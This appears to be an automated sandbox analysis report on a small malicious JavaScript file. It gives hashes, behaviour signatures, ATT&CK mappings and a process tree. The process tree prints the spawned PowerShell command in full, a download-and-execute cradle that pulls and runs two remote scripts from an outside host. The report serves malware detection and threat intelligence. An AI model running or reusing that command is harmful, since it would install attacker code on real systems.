Analysis

  • max time kernel
    120s
  • max time network
    124s
  • platform
    windows7_x64
  • resource
    win7-20240611-en
  • resource tags

    arch:x64arch:x86image:win7-20240611-enlocale:en-usos:windows7-x64system
  • submitted
    12-06-2024 02:33

General

  • Target

    f2fa65752c20d58faf3a9546ef3a1792565a075e9e64b65a7921875c1300fb37.js

  • Size

    1KB

  • MD5

    b8b73de27d87836914a258507b8066cc

  • SHA1

    bb10873bfb35fb2d7ffb2942bba35d65068f6f70

  • SHA256

    f2fa65752c20d58faf3a9546ef3a1792565a075e9e64b65a7921875c1300fb37

  • SHA512

    085fdbe93fb90614701bd5361933e47e3a2992e9d2fe6379b5e1c60e51628ee05b988ca8fac171d0b11f1485efb21b995f0262097e18708a6b062256d6a66c0b

Score
3/10

Malware Config

Signatures

  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\f2fa65752c20d58faf3a9546ef3a1792565a075e9e64b65a7921875c1300fb37.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2368
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -command "$env:paths = '7z6CIMQJA0CS'; IEX(IWR -UseBasicParsing 'https://lechiavetteusb.it/imgs/usb/logo/khesariQUXH.ps1'); $vv.SetValue($null, [bool]'RGJU7PGYEPE'); IEX(IWR -UseBasicParsing 'https://lechiavetteusb.it/imgs/usb/logo/wizeninglYZn.ps1')"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2252

Network

MITRE ATT&CK Matrix ATT&CK v13

Execution

Command and Scripting Interpreter

2
T1059

PowerShell

1
T1059.001

JavaScript

1
T1059.007

Discovery

System Information Discovery

1
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2252-3-0x00000000739F1000-0x00000000739F2000-memory.dmp
    Filesize

    4KB

  • memory/2252-4-0x00000000739F0000-0x0000000073F9B000-memory.dmp
    Filesize

    5.7MB

  • memory/2252-5-0x00000000739F0000-0x0000000073F9B000-memory.dmp
    Filesize

    5.7MB

  • memory/2252-6-0x00000000739F0000-0x0000000073F9B000-memory.dmp
    Filesize

    5.7MB

  • memory/2252-7-0x00000000739F0000-0x0000000073F9B000-memory.dmp
    Filesize

    5.7MB

  • memory/2252-8-0x00000000739F0000-0x0000000073F9B000-memory.dmp
    Filesize

    5.7MB